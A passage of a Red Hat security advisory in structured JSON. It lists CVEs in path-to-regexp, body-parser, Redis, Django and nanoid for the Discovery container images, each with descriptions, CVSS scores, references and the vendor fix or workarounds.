path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { cve: "CVE-2024-46981", cwe: { id: "CWE-416", name: "Use After Free", }, discovery_date: "2025-01-06T22:00:39.382359+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2336004", }, ], notes: [ { category: "description", text: "A flaw was found in the Redis server. This flaw allows an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, potentially leading to remote code execution.", title: "Vulnerability description", }, { category: "summary", text: "redis: Redis' Lua library commands may lead to remote code execution", title: "Vulnerability summary", }, { category: "other", text: "The problem exists in all versions of Redis with Lua scripting.\n\nThis vulnerability in Redis is classified as high severity rather than moderate due to its potential impact and exploitation scope. By manipulating the Lua garbage collector through crafted scripts, an authenticated attacker can achieve remote code execution (RCE), allowing them to execute arbitrary commands on the host system. This compromises not only the integrity and confidentiality of the data stored in Redis but also the underlying server itself. Furthermore, the exploitation does not require direct access to the server binary, making it feasible for attackers to execute through legitimate, albeit malicious, commands.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-46981", }, { category: "external", summary: "RHBZ#2336004", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2336004", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-46981", url: "https://www.cve.org/CVERecord?id=CVE-2024-46981", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-46981", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-46981", }, { category: "external", summary: "https://github.com/redis/redis/releases/tag/6.2.17", url: "https://github.com/redis/redis/releases/tag/6.2.17", }, { category: "external", summary: "https://github.com/redis/redis/releases/tag/7.2.7", url: "https://github.com/redis/redis/releases/tag/7.2.7", }, { category: "external", summary: "https://github.com/redis/redis/releases/tag/7.4.2", url: "https://github.com/redis/redis/releases/tag/7.4.2", }, { category: "external", summary: "https://github.com/redis/redis/security/advisories/GHSA-39h2-x6c4-6w4c", url: "https://github.com/redis/redis/security/advisories/GHSA-39h2-x6c4-6w4c", }, ], release_date: "2025-01-06T21:11:51.687000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "A workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "redis: Redis' Lua library commands may lead to remote code execution", }, { cve: "CVE-2024-52798", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-12-05T23:00:59.020167+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2330689", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp. A path-to-regexp turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance.", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: path-to-regexp Unpatched `path-to-regexp` ReDoS in 0.1.x", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability exists because of an incomplete fix for CVE-2024-45296.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-52798", }, { category: "external", summary: "RHBZ#2330689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2330689", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-52798", url: "https://www.cve.org/CVERecord?id=CVE-2024-52798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-52798", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-52798", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4", url: "https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-rhx6-c78j-4q9w", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-rhx6-c78j-4q9w", }, ], release_date: "2024-12-05T22:45:42.774000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Avoid using two parameters within a single path segment when the separator is not, for example, /:a-:b. Alternatively, you can define the regex used for both parameters and ensure they do not overlap to allow backtracking.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: path-to-regexp Unpatched `path-to-regexp` ReDoS in 0.1.x", }, { cve: "CVE-2024-53907", cwe: { id: "CWE-1169", name: "CWE-1169", }, discovery_date: "2024-11-28T02:48:36.215000+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2329288", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Django Web Framework. The strip_tags() and stripbtags template filter may be vulnerable to a potential denial of service (DoS) in cases of a large sequence of nested incomplete HTML entities.", title: "Vulnerability description", }, { category: "summary", text: "django: Potential denial-of-service in django.utils.html.strip_tags()", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as a Moderate severity because it exposes the strip_tags() method and striptags template filter to a potential denial-of-service attack, malicious input containing large sequences of nested incomplete HTML entities could cause excessive processing, but it does not affect data confidentiality or integrity", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-53907", }, { category: "external", summary: "RHBZ#2329288", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2329288", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-53907", url: "https://www.cve.org/CVERecord?id=CVE-2024-53907", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-53907", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-53907", }, { category: "external", summary: "https://www.djangoproject.com/weblog/2024/dec/04/security-releases/", url: "https://www.djangoproject.com/weblog/2024/dec/04/security-releases/", }, ], release_date: "2024-12-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "django: Potential denial-of-service in django.utils.html.strip_tags()", }, { cve: "CVE-2024-55565", cwe: { id: "CWE-835", name: "Loop with Unreachable Exit Condition ('Infinite Loop')", }, discovery_date: "2024-12-09T02:00:45.255738+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2331063", }, ], notes: [ { category: "description", text: "nanoid (aka Nano ID) before 5.0.9 mishandles non-integer values. 3.3.8 is also a fixed version.", title: "Vulnerability description", }, { category: "summary", text: "nanoid: nanoid mishandles non-integer values", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-55565", }, { category: "external", summary: "RHBZ#2331063", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2331063", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-55565", url: "https://www.cve.org/CVERecord?id=CVE-2024-55565", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-55565", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-55565", }, { category: "external", summary: "https://github.com/ai/nanoid/compare/3.3.7...3.3.8", url: "https://github.com/ai/nanoid/compare/3.3.7...3.3.8", }, { category: "external", summary: "https://github.com/ai/nanoid/pull/510", url: "https://github.com/ai/nanoid/pull/510", }, { category: "external", summary: "https://github.com/ai/nanoid/releases/tag/5.0.9", url: "https://github.com/ai/nanoid/releases/tag/5.0.9", }, ], release_date: "2024-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: 